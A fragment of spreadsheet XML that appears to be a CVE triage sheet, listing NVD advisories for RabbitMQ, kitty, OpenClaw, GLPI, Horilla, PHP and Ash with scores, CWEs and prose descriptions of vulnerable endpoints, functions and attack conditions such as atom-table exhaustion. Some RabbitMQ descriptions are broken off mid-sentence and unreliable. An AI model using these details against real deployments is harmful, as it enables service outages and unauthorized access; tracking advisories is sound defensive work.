      <c r="E300" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F300" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G300" s="5" t="inlineStr"/>
      <c r="H300" s="5" t="inlineStr"/>
      <c r="I300" s="5" t="inlineStr"/>
      <c r="J300" s="5" t="inlineStr">
        <is>
          <t>requests, go, gin</t>
        </is>
      </c>
      <c r="K300" s="5" t="inlineStr"/>
      <c r="L300" s="5" t="inlineStr"/>
      <c r="M300" s="5" t="inlineStr"/>
      <c r="N300" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O300" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P300" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q300" s="5" t="inlineStr"/>
      <c r="R300" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S300" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 3.13.15 and 4.0.20 and 4.1.11 and 4.2.6, Atom table exhaustion via management API node field. pUT /api/queues/:vhost/:name (and the exchanges and bindings endpoints) accepts a node JSON field. The value goes through rabbitnodes:make → listtoatom with no cluster membership check first. Each unique value permanently leaks one atom. A March 2026 refactoring (ea61ce2563) introduced safe helpers in rabbitmgmtnodes.erl (parsenodename, safeatom, and requirenodename, using binarytoexistingatom) and fixed several callers (QQ replica ops, wmauthattempts, wmnodememoryets, getsortreverse, and rabbitfederationmgmt), but getnode/1 in rabbitmgmtutil.erl:880-885, the primary vector used by directrequest/6, was not Roughly 900K requests crash the VM via systemlimit, and all tenants lose Any user with the management tag and one vhost, the lowest privilege This issue is fixed in versions 3.13.15 and 4.0.20 and 4.1.11 and 4.2.6.</t>
        </is>
      </c>
      <c r="T300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66073</t>
        </is>
      </c>
    </row>
    <row r="301">
      <c r="A301" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B301" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67411</t>
        </is>
      </c>
      <c r="D301" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E301" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F301" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G301" s="5" t="inlineStr"/>
      <c r="H301" s="5" t="inlineStr"/>
      <c r="I301" s="5" t="inlineStr"/>
      <c r="J301" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K301" s="5" t="inlineStr"/>
      <c r="L301" s="5" t="inlineStr"/>
      <c r="M301" s="5" t="inlineStr"/>
      <c r="N301" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O301" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P301" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q301" s="5" t="inlineStr"/>
      <c r="R301" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S301" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 3.13.18, 4.0.23, 4.1.14, 4.2.9, and 4.3.3, native MQTT and MQTT over WebSocket behind a trusted PROXY Protocol frontend could lose the proxy-derived client address before the MQTT authentication path checked loopback_users, causing the frontend-to-broker address to be treated as loopback. An attacker who can reach the trusted frontend and has valid credentials for a loopback-restricted account can therefore bypass the source-address restriction; the issue does not bypass password authentication. This issue is fixed in versions 3.13.18, 4.0.23, 4.1.14, 4.2.9, and 4.3.3.</t>
        </is>
      </c>
      <c r="T301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67411</t>
        </is>
      </c>
    </row>
    <row r="302">
      <c r="A302" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B302" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67412</t>
        </is>
      </c>
      <c r="D302" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E302" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F302" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G302" s="5" t="inlineStr"/>
      <c r="H302" s="5" t="inlineStr"/>
      <c r="I302" s="5" t="inlineStr"/>
      <c r="J302" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K302" s="5" t="inlineStr"/>
      <c r="L302" s="5" t="inlineStr"/>
      <c r="M302" s="5" t="inlineStr"/>
      <c r="N302" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O302" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P302" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q302" s="5" t="inlineStr"/>
      <c r="R302" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S302" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 4.3.3, 4.2.9 , 4.1.14, 4.0.24, and 3.13.18, Federation upstream in RabbitMQ skips vhost authorization allowing cross-vhost message access. what the bug lets you do. A policymaker on one vhost reads and drains messages out of another vhost it has no permission on. With the default ack-mode the source messages are consumed (deleted), not copied. Why that should not 1. Federation validates the upstream URI without any vhost-access Cross-vhost message read/drain from a per-vhost policymaker, breaking vhost tenancy This issue is fixed in versions 4.3.3, 4.2.9 , 4.1.14, 4.0.24, and 3.13.18.</t>
        </is>
      </c>
      <c r="T302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67412</t>
        </is>
      </c>
    </row>
    <row r="303">
      <c r="A303" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B303" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67413</t>
        </is>
      </c>
      <c r="D303" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E303" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F303" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G303" s="5" t="inlineStr"/>
      <c r="H303" s="5" t="inlineStr"/>
      <c r="I303" s="5" t="inlineStr"/>
      <c r="J303" s="5" t="inlineStr">
        <is>
          <t>express, gin</t>
        </is>
      </c>
      <c r="K303" s="5" t="inlineStr"/>
      <c r="L303" s="5" t="inlineStr"/>
      <c r="M303" s="5" t="inlineStr"/>
      <c r="N303" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O303" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P303" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q303" s="5" t="inlineStr"/>
      <c r="R303" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="S303" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.0.0 until 4.0.23, 4.1.14, 4.2.9, and 4.3.3, the optional rabbitmq_jms_topic_exchange plugin's x-jms-topic exchange accepted a client-controlled rjms_erlang_selector binding expression whose LIKE evaluator expanded percent and underscore wildcards into overlapping PCRE fragments. It executed those fragments with raw re:run/3 without match or recursion limits, allowing an authenticated tenant that can bind and publish to consume broker scheduler CPU and deny service with pathological selectors. This issue is fixed in versions 4.0.23, 4.1.14, 4.2.9, and 4.3.3.</t>
        </is>
      </c>
      <c r="T303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67413</t>
        </is>
      </c>
    </row>
    <row r="304">
      <c r="A304" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B304" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80432</t>
        </is>
      </c>
      <c r="D304" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E304" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F304" s="5" t="inlineStr">
        <is>
          <t>4daa8cea-433a-44bd-9456-53b127fc289a</t>
        </is>
      </c>
      <c r="G304" s="5" t="inlineStr"/>
      <c r="H304" s="5" t="inlineStr"/>
      <c r="I304" s="5" t="inlineStr"/>
      <c r="J304" s="5" t="inlineStr"/>
      <c r="K304" s="5" t="inlineStr"/>
      <c r="L304" s="5" t="inlineStr"/>
      <c r="M304" s="5" t="inlineStr"/>
      <c r="N304" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O304" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P304" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q304" s="5" t="inlineStr"/>
      <c r="R304" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S304" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization in the drop handling path of the drag and drop protocol in kitty from 0.47.0 before 0.49.0 allows a program writing to the terminal to obtain the contents of files dragged over the window even when the user never completes the drop, because drop_enqueue_request() in kitty/dnd.c serves a drag data request without first checking the drop state of the window, so a client that issues the request while a drag is merely hovering receives the data offered for the drag. In the same file, drop_left_child(), which runs when the drag leaves the window without a drop having occurred, releases the offered MIME list but retains the pending request state, the open file descriptor and its main loop transfer timer, the directory handles, the URI list and the pending MIME name, so a client can continue to read through a retained directory handle, and an in-flight file transfer continues to stream, when no drag is in progress. The file contents are read from the filesystem by the kitty process itself using the paths the drag source offered. This results in disclosure of the contents of files the user moved over the window without ever releasing them into it.</t>
        </is>
      </c>
      <c r="T304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80432</t>
        </is>
      </c>
    </row>
    <row r="305">
      <c r="A305" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B305" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100574</t>
        </is>
      </c>
      <c r="D305" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E305" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F305" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G305" s="5" t="inlineStr"/>
      <c r="H305" s="5" t="inlineStr"/>
      <c r="I305" s="5" t="inlineStr"/>
      <c r="J305" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K305" s="5" t="inlineStr"/>
      <c r="L305" s="5" t="inlineStr"/>
      <c r="M305" s="5" t="inlineStr"/>
      <c r="N305" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O305" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P305" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q305" s="5" t="inlineStr"/>
      <c r="R305" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S305" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.8.1 contains a server-side request forgery vulnerability in its trusted-host DNS checks. For fetches that use the trusted-host DNS recheck, a trusted hostname that resolves to an unspecified address (0.0.0.0 or ::) bypasses the SSRF destination validation. An attacker who can influence DNS for an allowed hostname can therefore cause a guarded fetch to reach a service bound only to loopback and disclose its response; the practical impact depends on the reachable service and the data it returns. Fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100574</t>
        </is>
      </c>
    </row>
    <row r="306">
      <c r="A306" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B306" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53628</t>
        </is>
      </c>
      <c r="D306" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E306" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F306" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G306" s="5" t="inlineStr"/>
      <c r="H306" s="5" t="inlineStr"/>
      <c r="I306" s="5" t="inlineStr"/>
      <c r="J306" s="5" t="inlineStr"/>
      <c r="K306" s="5" t="inlineStr"/>
      <c r="L306" s="5" t="inlineStr"/>
      <c r="M306" s="5" t="inlineStr"/>
      <c r="N306" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O306" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P306" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q306" s="5" t="inlineStr"/>
      <c r="R306" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="S306" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 0.84 until 10.0.26 and 11.0.8, an administrator holding the Update auth and sync or Update auth, sync and 2FA right can change the authentication method and disable two-factor authentication for user accounts outside the administrator's entity scope. The affected user-account administration flow did not consistently enforce the target user's entity-scoped update permission. This issue is fixed in versions 11.0.8 and 10.0.26.</t>
        </is>
      </c>
      <c r="T306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53628</t>
        </is>
      </c>
    </row>
    <row r="307">
      <c r="A307" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B307" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67222</t>
        </is>
      </c>
      <c r="D307" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E307" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F307" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G307" s="5" t="inlineStr"/>
      <c r="H307" s="5" t="inlineStr"/>
      <c r="I307" s="5" t="inlineStr"/>
      <c r="J307" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K307" s="5" t="inlineStr"/>
      <c r="L307" s="5" t="inlineStr"/>
      <c r="M307" s="5" t="inlineStr"/>
      <c r="N307" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O307" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P307" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q307" s="5" t="inlineStr"/>
      <c r="R307" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S307" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 3.13.15, 4.0.20, 4.1.11, and 4.2.6, mechanisms/1 applied list_to_atom/1 to every colon-delimited token in an attacker-controlled auth_mechanism value, permanently consuming Erlang VM atoms and allowing the node to be crashed with a large request. Exploitation requires the Shovel or Federation plugin to be in use, and setting auth_mechanism requires the policymaker tag. This issue is fixed in versions 3.13.15, 4.0.20, 4.1.11, and 4.2.6.</t>
        </is>
      </c>
      <c r="T307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67222</t>
        </is>
      </c>
    </row>
    <row r="308">
      <c r="A308" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B308" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67227</t>
        </is>
      </c>
      <c r="D308" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E308" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F308" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G308" s="5" t="inlineStr"/>
      <c r="H308" s="5" t="inlineStr"/>
      <c r="I308" s="5" t="inlineStr"/>
      <c r="J308" s="5" t="inlineStr">
        <is>
          <t>requests, gin</t>
        </is>
      </c>
      <c r="K308" s="5" t="inlineStr"/>
      <c r="L308" s="5" t="inlineStr"/>
      <c r="M308" s="5" t="inlineStr"/>
      <c r="N308" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O308" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P308" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q308" s="5" t="inlineStr"/>
      <c r="R308" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S308" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.0.0 until 4.0.22 and 4.1.14 and 4.2.7 and 4.3.1, Atom exhaustion: toatom on global-parameter :name. resourceexists/2 (and the PUT/DELETE handlers) call rabbitdatacoercion:toatom/1 on the :name URL path segment. toatom/1 uses binarytoatom/2 (unsafe). The endpoint requires policymaker (not management, but below A user with the policymaker tag can crash the node by exhausting the atom table via repeated requests to /api/global-parameters/:name with unique :name Management plugin enabled policymaker tag ~1M HTTP. This issue is fixed in versions 4.0.22 and 4.1.14 and 4.2.7 and 4.3.1.</t>
        </is>
      </c>
      <c r="T308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67227</t>
        </is>
      </c>
    </row>
    <row r="309">
      <c r="A309" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B309" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67415</t>
        </is>
      </c>
      <c r="D309" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E309" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F309" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G309" s="5" t="inlineStr"/>
      <c r="H309" s="5" t="inlineStr"/>
      <c r="I309" s="5" t="inlineStr"/>
      <c r="J309" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K309" s="5" t="inlineStr"/>
      <c r="L309" s="5" t="inlineStr"/>
      <c r="M309" s="5" t="inlineStr"/>
      <c r="N309" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O309" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P309" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q309" s="5" t="inlineStr"/>
      <c r="R309" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S309" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.2.0 until 4.2.9 and 4.3.3, the Shovel parameter parser converted attacker-controlled runtime parameter values into non-garbage-collected Erlang atoms before bounding them or checking a fixed allowlist. Exploitation requires network access to the Management HTTP API, valid credentials with both the management and policymaker tags, permission to set Shovel runtime parameters on a vhost, and the rabbitmq_shovel and rabbitmq_shovel_management plugins to be enabled. The attacker can exhaust the node-wide atom table and deny service, and malicious parameters are stored durably and reparsed when workers start, so atom pressure can recur after restart without a live attacker connection. This issue is fixed in versions 4.2.9 and 4.3.3.</t>
        </is>
      </c>
      <c r="T309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67415</t>
        </is>
      </c>
    </row>
    <row r="310">
      <c r="A310" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B310" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86066</t>
        </is>
      </c>
      <c r="D310" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E310" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F310" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G310" s="5" t="inlineStr"/>
      <c r="H310" s="5" t="inlineStr"/>
      <c r="I310" s="5" t="inlineStr"/>
      <c r="J310" s="5" t="inlineStr">
        <is>
          <t>django, go</t>
        </is>
      </c>
      <c r="K310" s="5" t="inlineStr"/>
      <c r="L310" s="5" t="inlineStr"/>
      <c r="M310" s="5" t="inlineStr"/>
      <c r="N310" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O310" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P310" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q310" s="5" t="inlineStr"/>
      <c r="R310" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S310" s="5" t="inlineStr">
        <is>
          <t>Horilla is an HR and CRM software. Prior to 2.0.0, approve_validate_attendance_request at /attendance/approve-validate-attendance-request/ changes attendance_validated, is_validate_request_approved, approved_by, and related pending-request state through an HTTP GET before calling attendance.save(), so Django does not require CSRF validation for the action. An unauthenticated attacker can cause a logged-in manager with attendance.change_attendance to make a top-level request that carries the manager's SameSite=Lax session cookie, silently approving attendance with the victim's privileges and attributing the approval to the victim in the audit trail. This issue is fixed in version 2.0.0.</t>
        </is>
      </c>
      <c r="T310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86066</t>
        </is>
      </c>
    </row>
    <row r="311">
      <c r="A311" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B311" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91766</t>
        </is>
      </c>
      <c r="D311" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E311" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F311" s="5" t="inlineStr">
        <is>
          <t>security@php.net</t>
        </is>
      </c>
      <c r="G311" s="5" t="inlineStr"/>
      <c r="H311" s="5" t="inlineStr"/>
      <c r="I311" s="5" t="inlineStr"/>
      <c r="J311" s="5" t="inlineStr">
        <is>
          <t>github, gin</t>
        </is>
      </c>
      <c r="K311" s="5" t="inlineStr"/>
      <c r="L311" s="5" t="inlineStr"/>
      <c r="M311" s="5" t="inlineStr"/>
      <c r="N311" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O311" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P311" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q311" s="5" t="inlineStr"/>
      <c r="R311" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-522</t>
        </is>
      </c>
      <c r="S311" s="5" t="inlineStr">
        <is>
          <t>When the http:// stream wrapper follows a redirect it forwards the user-supplied Authorization, Cookie and Proxy-Authorization headers unchanged, even when the redirect target is a different host, a different port, or a downgrade from HTTPS to HTTP. A server that can steer a redirect therefore receives credentials that were only meant for the original origin. This is the same class of issue that libcurl fixed in 7.58.0 ( CVE-2018-1000007 https://github.com/advisories/GHSA-g7x2-hrfp-pv5f ).</t>
        </is>
      </c>
      <c r="T311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91766</t>
        </is>
      </c>
    </row>
    <row r="312">
      <c r="A312" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B312" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92842</t>
        </is>
      </c>
      <c r="D312" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E312" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F312" s="5" t="inlineStr">
        <is>
          <t>security@php.net</t>
        </is>
      </c>
      <c r="G312" s="5" t="inlineStr"/>
      <c r="H312" s="5" t="inlineStr"/>
      <c r="I312" s="5" t="inlineStr"/>
      <c r="J312" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K312" s="5" t="inlineStr"/>
      <c r="L312" s="5" t="inlineStr"/>
      <c r="M312" s="5" t="inlineStr"/>
      <c r="N312" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O312" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P312" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q312" s="5" t="inlineStr"/>
      <c r="R312" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="S312" s="5" t="inlineStr">
        <is>
          <t>The convert.base64-encode, convert.quoted-printable-encode and convert.quoted-printable-decode stream filters accept a line-break-chars option whose length is tracked separately from the string itself. The filter constructors duplicate the value with pestrdup(), which stops at the first NUL byte, while keeping the original length. When the filter later emits a line break it copies the recorded length out of the truncated allocation, reading past its end and placing adjacent heap bytes into the filter output.</t>
        </is>
      </c>
      <c r="T312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92842</t>
        </is>
      </c>
    </row>
    <row r="313">
      <c r="A313" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B313" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93477</t>
        </is>
      </c>
      <c r="D313" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E313" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F313" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G313" s="5" t="inlineStr"/>
      <c r="H313" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I313" s="5" t="inlineStr"/>
      <c r="J313" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K313" s="5" t="inlineStr"/>
      <c r="L313" s="5" t="inlineStr"/>
      <c r="M313" s="5" t="inlineStr"/>
      <c r="N313" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O313" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P313" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q313" s="5" t="inlineStr"/>
      <c r="R313" s="5" t="inlineStr">
        <is>
          <t>CWE-915</t>
        </is>
      </c>
      <c r="S313" s="5" t="inlineStr">
        <is>
          <t>Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability in ash-project ash allows a user to set the value of a private action argument on the bulk destroy and bulk update paths.
Action arguments declared with public?: false are meant to be set only by trusted server-side code (for example via Ash.Changeset.set_private_argument/3) and must not be settable from end-user input. CVE-2026-55736 fixed the non-bulk changeset path to strip private arguments from user-supplied parameter maps, but the bulk destroy and bulk update paths were not covered.
Ash.Actions.Destroy.Bulk.base_changeset/5 and Ash.Actions.Update.Bulk.base_changeset/5 match every key in the caller-supplied parameter map against all of the action's arguments with no public? check, then apply the matches to the base changeset. A caller who can submit parameters to a bulk destroy or bulk update action (for example through AshJsonApi, AshGraphql, or a controller that forwards request parameters to Ash.bulk_destroy/4 or Ash.bulk_update/4) can therefore set any private argument of that action, including one referenced by an arg(...) template in the action's changes or validations. Depending on how the application uses the argument (for example an acting_user_id driving authorization or record ownership, or audit metadata), this can lead to an integrity violation or privilege escalation.
The fix requires public? in the argument matching on both bulk paths; private arguments remain settable server-side via the :private_arguments option.
